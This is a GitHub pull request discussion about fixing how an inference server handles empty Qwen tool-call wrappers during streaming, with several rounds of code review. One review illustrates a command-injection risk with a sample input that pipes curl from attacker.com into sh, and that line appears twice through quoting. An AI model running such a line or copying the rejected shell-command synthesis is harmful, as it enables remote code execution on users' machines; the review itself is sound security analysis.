Skip to content

fix: Qwen tool streaming recovery#497

Open
kylejeske wants to merge 1 commit into
waybarrios:mainfrom
kylejeske:fix-qwen-tool-streaming-recovery
Open

fix: Qwen tool streaming recovery#497
kylejeske wants to merge 1 commit into
waybarrios:mainfrom
kylejeske:fix-qwen-tool-streaming-recovery

Conversation

@kylejeske

Copy link
Copy Markdown

Summary

  • synthesize a request-aware tool call when Qwen emits an empty XML tool wrapper
  • pass request context into streaming tool parsers while preserving compatibility with older parser shims
  • defer post-tool streaming content until final decoded text to avoid corrupt partial deltas

Tests

  • uv run ruff check vllm_mlx/ tests/ --select E,F,W --ignore E402,E501,E731,F811,F841
  • uv run black --check vllm_mlx/ tests/
  • uv run pytest tests/test_qwen3_xml_parser.py tests/test_server.py

Notes

  • uv run mypy vllm_mlx/ --ignore-missing-imports --no-error-summary still reports the repository's existing broad type-check baseline; CI marks that job continue-on-error.
  • uv run pre-commit run --all-files also fails on existing full-repo hook issues: old Ruff hook argument parsing, broad line-length findings, and the same Mypy baseline. The CI-equivalent Ruff and Black checks above pass.

@kylejeske kylejeske changed the title Fix Qwen tool streaming recovery fix: Qwen tool streaming recovery May 5, 2026
@kylejeske

kylejeske commented May 5, 2026

Copy link
Copy Markdown
Author

@janhilgard @waybarrios

Stack:

  • MBP M5 Pro
  • Qwen3.6 on mlx-vllm (latest package)
  • Pi Agent

I ran into a scenario where asking the model to run a bash command (list the files in this folder) while streaming resulted in a corrupted output. This PR addresses that.

I've attempted to follow your guide for contributing. Please let me know if there is anything missing.

@janhilgard janhilgard left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the contribution and for following the guide! I understand the frustration with empty `<tool_call></>` wrappers — it's a real model failure case. However, this PR takes an approach that's architecturally dangerous for an inference server. Here's why:

Critical: Server-side tool call synthesis is fundamentally wrong

The core of this PR makes the inference server guess which tool the model meant to call and fabricate arguments. This violates the basic contract of an OpenAI-compatible API: the server faithfully reports what the model generates — it never invents content.

Security: Command injection

The synthesis logic extracts paths from user text via regex and inserts them into shell commands:

args["command"] = f"ls -la {_shell_quote_path(target)}"

A malicious (or just unlucky) user message like:

list files in ~/'; curl attacker.com/pwn | sh; echo '

…gets turned into a synthesized bash command by the server. The client trusts tool calls because they came from the model — here they didn't. The _shell_quote_path function won't catch all edge cases (it never can when the server is fabricating shell commands).

Architectural: Hallucinating on behalf of the model

If the model emits an empty <tool_call></tool_call>, the correct responses are:

  1. Return any text before the marker as content
  2. Log a warning about malformed tool output
  3. Let the client/agent framework decide what to do (retry, fallback, etc.)

The server should never decide "the model probably meant bash" based on fuzzy heuristics like regex-matching "list|show|ls|dir" in the user message. This breaks:

  • Deterministic reproducibility (same generation → different behavior depending on user text)
  • Client trust (tool calls are no longer reliably from the model)
  • Audit trails (who called the tool — the model or the server?)

Streaming deferral is too broad

The defer_content_until_finish flag triggers for all responses after tool messages — not just the broken case. This defeats streaming entirely for multi-turn tool-use conversations (which are the majority use case for tool-calling agents), turning every response into a single final chunk.

What to do instead

The real fix is much simpler:

  1. When the parser encounters <tool_call></> or <tool_call></tool_call> with no content, treat it as content (not a tool call) — the model failed to generate a proper tool invocation.
  2. Optionally strip the empty XML wrapper from the returned content.
  3. Log a warning: logger.warning("Model emitted empty tool_call wrapper, treating as content")

The client/agent (in your case "Pi Agent") can then see the empty/garbled response and retry the request. This is the correct layer for recovery logic — the agent framework, not the inference server.

Minor: Good parts

  • Hoisting request.model_dump() into request_dict once (instead of calling it repeatedly) is a nice perf improvement — I'd accept that as a standalone change.
  • The try/except TypeError fallback for the request= kwarg is a reasonable compatibility shim if the streaming parser API genuinely needs request context (for non-synthesis purposes).

tl;dr: An inference server must never fabricate tool calls. The empty-wrapper case should be treated as a generation failure and returned as content (or an empty response), letting the client decide how to recover.

@kylejeske kylejeske force-pushed the fix-qwen-tool-streaming-recovery branch from 7138147 to ce33946 Compare May 5, 2026 16:02
@kylejeske kylejeske requested a review from janhilgard May 5, 2026 16:04
@kylejeske

Copy link
Copy Markdown
Author

Thanks for the contribution and for following the guide! I understand the frustration with empty <tool_call></> wrappers — it's a real model failure case. However, this PR takes an approach that's architecturally dangerous for an inference server. Here's why:

Critical: Server-side tool call synthesis is fundamentally wrong

The core of this PR makes the inference server guess which tool the model meant to call and fabricate arguments. This violates the basic contract of an OpenAI-compatible API: the server faithfully reports what the model generates — it never invents content.

Security: Command injection

The synthesis logic extracts paths from user text via regex and inserts them into shell commands:

args["command"] = f"ls -la {_shell_quote_path(target)}"

A malicious (or just unlucky) user message like:

list files in ~/'; curl attacker.com/pwn | sh; echo '

…gets turned into a synthesized bash command by the server. The client trusts tool calls because they came from the model — here they didn't. The _shell_quote_path function won't catch all edge cases (it never can when the server is fabricating shell commands).

Architectural: Hallucinating on behalf of the model

If the model emits an empty <tool_call></tool_call>, the correct responses are:

  1. Return any text before the marker as content
  2. Log a warning about malformed tool output
  3. Let the client/agent framework decide what to do (retry, fallback, etc.)

The server should never decide "the model probably meant bash" based on fuzzy heuristics like regex-matching "list|show|ls|dir" in the user message. This breaks:

  • Deterministic reproducibility (same generation → different behavior depending on user text)
  • Client trust (tool calls are no longer reliably from the model)
  • Audit trails (who called the tool — the model or the server?)

Streaming deferral is too broad

The defer_content_until_finish flag triggers for all responses after tool messages — not just the broken case. This defeats streaming entirely for multi-turn tool-use conversations (which are the majority use case for tool-calling agents), turning every response into a single final chunk.

What to do instead

The real fix is much simpler:

  1. When the parser encounters <tool_call></> or <tool_call></tool_call> with no content, treat it as content (not a tool call) — the model failed to generate a proper tool invocation.
  2. Optionally strip the empty XML wrapper from the returned content.
  3. Log a warning: logger.warning("Model emitted empty tool_call wrapper, treating as content")

The client/agent (in your case "Pi Agent") can then see the empty/garbled response and retry the request. This is the correct layer for recovery logic — the agent framework, not the inference server.

Minor: Good parts

  • Hoisting request.model_dump() into request_dict once (instead of calling it repeatedly) is a nice perf improvement — I'd accept that as a standalone change.
  • The try/except TypeError fallback for the request= kwarg is a reasonable compatibility shim if the streaming parser API genuinely needs request context (for non-synthesis purposes).

tl;dr: An inference server must never fabricate tool calls. The empty-wrapper case should be treated as a generation failure and returned as content (or an empty response), letting the client decide how to recover.

Thanks for the thorough review, a lot of good points here. A bunch of this actually overlaps with an update I already had in flight, so I've folded your feedback into the update. Really appreciate the eye on it.

@waybarrios

Copy link
Copy Markdown
Owner

Took a look at the revised version. The wrapper handling and the request_dict hoist look good. Two small things worth tightening before merge.

In scheduler.py at L2151-2167, output_text is only assigned in the else branch but the ternary at construction time reads it:

if response.finish_reason == "stop":
    new_text = ""
else:
    detok = self._get_detokenizer(request_id)
    detok.add_token(response.token)
    new_text = detok.last_segment
    output_text = detok.text

output = RequestOutput(
    ...
    new_text=new_text,
    output_text=output_text if response.finish_reason != "stop" else "",
    ...
)

This only works because Python's ternary is lazy. Cleaner to bind both branches:

if response.finish_reason == "stop":
    new_text = ""
    output_text = ""
else:
    detok = self._get_detokenizer(request_id)
    detok.add_token(response.token)
    new_text = detok.last_segment
    output_text = detok.text

output = RequestOutput(
    ...
    new_text=new_text,
    output_text=output_text,
    ...
)

In server.py at L5562-5570 the override runs even when output.text is empty. "".startswith("") is True, so delta_text ends up as the empty string and whatever output.new_text had is dropped:

if post_tool_stream:
    full_text = getattr(output, "text", "") or ""
    if full_text.startswith(decoded_text_seen):
        delta_text = full_text[len(decoded_text_seen):]
        decoded_text_seen = full_text
    elif full_text:
        delta_text = full_text
        decoded_text_seen = full_text

Guarding the whole block on full_text preserves new_text when the engine yields a chunk without cumulative text:

if post_tool_stream:
    full_text = getattr(output, "text", "") or ""
    if full_text:
        if full_text.startswith(decoded_text_seen):
            delta_text = full_text[len(decoded_text_seen):]
        else:
            delta_text = full_text
        decoded_text_seen = full_text

@waybarrios waybarrios self-requested a review May 14, 2026 02:35

@waybarrios waybarrios left a comment

Copy link
Copy Markdown
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please check my previous comment

@janhilgard janhilgard left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The revised commit addresses the security and architectural concerns from my first review — the server no longer fabricates tool calls, empty XML wrappers are correctly treated as malformed generation with a warning. The request_dict hoist and try/except TypeError compatibility shim are clean additions. Test coverage is good.

However, waybarrios's two code issues from May 14 are still outstanding and need to be fixed before this can merge:

1. Unbound output_text in scheduler.py

In _process_batch_responses, output_text is only assigned in the else branch:

if response.finish_reason == "stop":
    new_text = ""
    # output_text not assigned here
else:
    ...
    output_text = detok.text

output = RequestOutput(
    ...
    output_text=output_text if response.finish_reason != "stop" else "",
)

This works today because Python's ternary is lazy — when finish_reason == "stop", the left operand is never evaluated. But it's fragile: any refactor that changes the ternary condition or evaluation order will produce UnboundLocalError. Please bind both branches:

if response.finish_reason == "stop":
    new_text = ""
    output_text = ""
else:
    detok = self._get_detokenizer(request_id)
    detok.add_token(response.token)
    new_text = detok.last_segment
    output_text = detok.text

2. Empty full_text drops new_text in server.py

The post_tool_stream block runs unconditionally:

if post_tool_stream:
    full_text = getattr(output, "text", "") or ""
    if full_text.startswith(decoded_text_seen):
        delta_text = full_text[len(decoded_text_seen):]
        decoded_text_seen = full_text

When the engine yields a chunk without cumulative text (or text is empty), full_text = "". Since "".startswith("") is True, delta_text gets overwritten with "", silently dropping whatever valid content output.new_text provided. Guard the whole block on full_text:

if post_tool_stream:
    full_text = getattr(output, "text", "") or ""
    if full_text:
        if full_text.startswith(decoded_text_seen):
            delta_text = full_text[len(decoded_text_seen):]
        else:
            delta_text = full_text
        decoded_text_seen = full_text

3. No CI

The branch has no CI checks. Please push to trigger CI and confirm tests pass (including the new test file).

Everything else — the _is_empty_tool_wrapper detection, the parser changes, the test coverage — looks correct.

@kylejeske kylejeske force-pushed the fix-qwen-tool-streaming-recovery branch from 2672ac4 to 802fb92 Compare May 18, 2026 22:23
@kylejeske

kylejeske commented May 18, 2026

Copy link
Copy Markdown
Author

Follow-up on the May 14 / May 17 review thread: I rebased the branch onto current main and addressed the two outstanding code comments in the new head commit 802fb92.

  • vllm_mlx/scheduler.py: _process_batch_responses now binds output_text = "" in the finish_reason == "stop" branch and passes output_text directly into RequestOutput.
  • vllm_mlx/server.py: the post-tool cumulative-text override now only runs the suffix calculation when full_text is non-empty, so chunks with empty cumulative text preserve output.new_text.
  • The branch is now mergeable against main; gh pr view reports mergeable: MERGEABLE for head 802fb92.

Local verification on the rebased branch:

uv run --with black black vllm_mlx/scheduler.py vllm_mlx/server.py vllm_mlx/tool_parsers/qwen3_xml_tool_parser.py tests/test_server.py tests/test_qwen3_xml_parser.py
uv run --with ruff ruff check vllm_mlx/scheduler.py vllm_mlx/server.py vllm_mlx/tool_parsers/qwen3_xml_tool_parser.py tests/test_server.py tests/test_qwen3_xml_parser.py --select E,F,W --ignore E402,E501,E731,F811,F841
uv run --with pytest pytest tests/test_qwen3_xml_parser.py tests/test_server.py tests/test_batching.py

Result: 157 passed, 5 deselected.
gh pr checks currently reports no checks on the branch, so there does not appear to be CI attached to this PR run.

@janhilgard janhilgard left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Code Review

1. Performance regression: full model_dump() instead of selective

# Before (selective):
tools_dict = (
    request.model_dump(include={"tools"}).get("tools")
    if request and request.tools
    else None
)

# After (full dump):
request_dict = request.model_dump() if request is not None else {}

model_dump() without include= serializes the entire request object (messages, tools, everything). With large contexts (60K+ tokens in messages), this can be slow and allocate significant memory on every request. The original code intentionally dumped only tools. Consider dumping only the fields you actually need:

request_dict = request.model_dump(include={"tools", "messages"}) if request is not None else {}

Or even better, build the dict manually from just tools and a lightweight messages role check.

2. Post-tool cumulative text fix won't work on batched engine path

The post-tool streaming fix reads cumulative text via:

full_text = getattr(output, "text", "") or ""

This works for GenerationOutput (simple engine) which has a text attribute. But the batched engine returns RequestOutput objects, where the cumulative text field is named output_text, not text. So getattr(output, "text", "") will always return "" for batched engine outputs, and the post-tool delta fix silently becomes a no-op.

The scheduler.py change adds output_text to non-finished chunks, but server.py never reads it. Either server.py should check both:

full_text = getattr(output, "text", "") or getattr(output, "output_text", "") or ""

Or the attribute name should be unified.

3. Try/except TypeError for API compatibility is fragile

try:
    tool_result = tool_parser.extract_tool_calls_streaming(
        tool_previous, tool_accumulated_text, content,
        request=request_dict,
    )
except TypeError as exc:
    if "unexpected keyword argument 'request'" not in str(exc):
        raise
    tool_result = tool_parser.extract_tool_calls_streaming(
        tool_previous, tool_accumulated_text, content
    )

This pattern appears twice (two streaming paths). Catching TypeError and checking the exception message string is brittle — it depends on CPython's exact error wording, which could change across Python versions. A cleaner approach would be to check the parser's signature once at init time:

import inspect
_parser_accepts_request = "request" in inspect.signature(tool_parser.extract_tool_calls_streaming).parameters

4. Tests only cover simple engine path

All test_server.py tests use FakeEngine yielding GenerationOutput (simple engine). None of them test the RequestOutput path (batched engine), which is the path used in production with --continuous-batching. This means the post-tool fix from point 2 above is untested on the production-relevant code path.

5. Minor: _is_empty_tool_wrapper regex

The </?> alternative (self-closing end tag without a name) is unusual — is this something Qwen actually emits? If so, a brief comment documenting the observed model output would help future readers.


Overall the PR addresses a real problem (empty tool wrapper synthesis, corrupt post-tool deltas), but the implementation has a few gaps — particularly the batched engine path not benefiting from the fix, and the performance cost of full model_dump().

@kylejeske kylejeske requested a review from janhilgard May 18, 2026 22:37

@janhilgard janhilgard left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Updated review (post-rebase, CI green)

waybarrios' two comments from May 14 are now addressed in the rebased commit 802fb92:

  • output_text = "" bound in both branches of the stop conditional ✅
  • if full_text: guard prevents override when cumulative text is empty ✅

CI is all green (lint, type-check, tests across Python 3.10-3.13 + Apple Silicon). Single squashed commit.

Remaining concerns from my previous review

1. Full model_dump() — still present

This serializes the entire request on every streaming call. With 60K+ token conversations this allocates unnecessary memory. A targeted dump would be better:

request_dict = request.model_dump(include={"tools", "messages"}) if request is not None else {}

Not a blocker, but worth noting for follow-up.

2. text vs output_text attribute mismatch — still present

The post-tool fix in server.py reads:

full_text = getattr(output, "text", "") or ""
  • GenerationOutput has .text → works ✅
  • RequestOutput (batched engine with --continuous-batching) has .output_text, not .textgetattr returns "" → fix is silently a no-op on the production-relevant code path ❌

The scheduler.py change correctly populates output_text on non-finished RequestOutput objects, but server.py never reads it. Should be:

full_text = getattr(output, "text", "") or getattr(output, "output_text", "") or ""

3. Try/except TypeError — still present

Not a blocker, but checking inspect.signature() once at init would be cleaner than catching TypeError twice per streaming loop.

Verdict

The empty-wrapper handling in qwen3_xml_tool_parser.py is solid and well-tested. The model_dump() and try/except patterns are minor style/perf issues. The text vs output_text mismatch (point 2) is the only functional gap — without it, the post-tool delta fix doesn't apply to batched engine users, which is the default production configuration.

If point 2 is addressed (one-line fix), this is ready to merge.

@kylejeske

Copy link
Copy Markdown
Author

Follow-up on the remaining text vs output_text concern: pushed 689c77f.

This keeps the change intentionally narrow:

  • server.py now falls back to output.output_text when output.text is absent/empty in the post-tool cumulative delta path.
  • Added test_stream_after_tool_message_uses_output_text_fallback to cover a streamed object with output_text but no text.

I left the broader model_dump() and parser compatibility cleanup alone for a follow-up PR to reduce regression risk in this one.

Local verification after the patch:

uv run --with ruff ruff check vllm_mlx/server.py tests/test_server.py --select E,F,W --ignore E402,E501,E731,F811,F841
uv run --with black black --check vllm_mlx/server.py tests/test_server.py
uv run --with pytest pytest tests/test_qwen3_xml_parser.py tests/test_server.py tests/test_batching.py

Result: 158 passed, 5 deselected.

@kylejeske kylejeske requested a review from janhilgard May 18, 2026 22:51

@janhilgard janhilgard left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The text vs output_text mismatch from my previous review is now fixed in 689c77f:

full_text = (
    getattr(output, "text", "")
    or getattr(output, "output_text", "")
    or ""
)

New test test_stream_after_tool_message_uses_output_text_fallback covers the batched engine path using SimpleNamespace with output_text but no text.

Two minor items for follow-up (not blocking):

  • Full model_dump() could be narrowed to include={"tools", "messages"} to avoid serializing the entire request
  • The two try/except TypeError shims could be replaced with a one-time inspect.signature() check

Please squash the two commits before merge.

LGTM — approving.

@kylejeske kylejeske force-pushed the fix-qwen-tool-streaming-recovery branch from 689c77f to 9ae8452 Compare May 19, 2026 11:31
@kylejeske

Copy link
Copy Markdown
Author

Squashed the branch as requested.

Current head is now a single commit:

9ae8452 fix: recover malformed Qwen tool-call streaming

GitHub currently reports the branch as mergeable/clean. Waiting on @waybarrios for re-review when you have a chance.

@waybarrios

Copy link
Copy Markdown
Owner

Thanks for the fix. A few speed and complexity items I would like to see addressed before this lands.

vllm_mlx/server.py:5683-5687. The old code only dumped the tools field:

tools_dict = (
    request.model_dump(include={"tools"}).get("tools")
    if request and request.tools
    else None
)

The new code dumps the whole request including every message:

request_dict = request.model_dump() if request is not None else {}
tools_dict = request_dict.get("tools") if request and request.tools else None

This walks the entire payload on every stream. The post_tool_stream check below only needs to scan messages, which can be done directly without a dump:

post_tool_stream = any(m.role == "tool" for m in (request.messages or []))

The full dict for the tool parser can be computed lazily the first time markup appears.

vllm_mlx/scheduler.py:2168. The change from output_token_ids=request.output_token_ids to output_token_ids=list(request.output_token_ids) adds a defensive copy on every batch chunk. The list grows by one per token, so total copying is quadratic in completion length, sitting in the decode hot path. What consumer is mutating it, and can the copy be scoped there rather than paid per chunk?

vllm_mlx/server.py:5831 and vllm_mlx/server.py:5960. The new kwarg propagation is wrapped in try/except TypeError with a string match:

try:
    tool_result = tool_parser.extract_tool_calls_streaming(
        tool_previous, tool_accumulated_text, content, request=request_dict,
    )
except TypeError as exc:
    if "unexpected keyword argument 'request'" not in str(exc):
        raise
    tool_result = tool_parser.extract_tool_calls_streaming(
        tool_previous, tool_accumulated_text, content
    )

Two near-duplicates of this block, and exception construction sits in the per-chunk path. The final-pass call at vllm_mlx/server.py:6048 passes request_dict positionally with no guard at all, so the asymmetry between the guarded streaming code and the unguarded final call needs resolving in one direction or the other.

vllm_mlx/tool_parsers/qwen3_xml_tool_parser.py:47. _is_empty_tool_wrapper recompiles the same two patterns on every call. Lift them to module-level re.compile(...) constants.

Since this touches the streaming hot path on three layers (stream_chat_completion, scheduler decode, streaming tool parser), TTFT and decode tok/s on Qwen3 at batch=1 and batch=8 from main and from the PR head on the same hardware would confirm the cost.

@waybarrios

Copy link
Copy Markdown
Owner

A few smaller things to round out the feedback, plus a request.

The PR title and summary mention synthesizing a request-aware tool call, but the implementation suppresses empty wrappers rather than synthesizing anything. The behavior is correct, the title just describes a different intent. Worth updating before merge so the squash message matches what shipped.

When the non-streaming extract_tool_calls detects an empty wrapper at vllm_mlx/tool_parsers/qwen3_xml_tool_parser.py:1328, it returns content="", so a response whose only output is <tool_call></tool_call> becomes silently empty to the client. Defensible since a warning is logged, but it changes user-visible behavior. Returning the original cleaned text as content would let the client see what the model actually produced.

The new test fixtures in tests/test_server.py repeat the same monkeypatch.setattr(server, ...) block five times along with the same FakeEngine skeleton. A small pytest fixture or helper would compress that significantly.

Lastly, main has moved a few commits since this branch was opened. Could you rebase against current main so CI runs cleanly and the perf numbers I asked for above are against the same baseline?

@waybarrios waybarrios left a comment

Copy link
Copy Markdown
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Check my comment. Let me know if you need an extra hand, happy to help!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants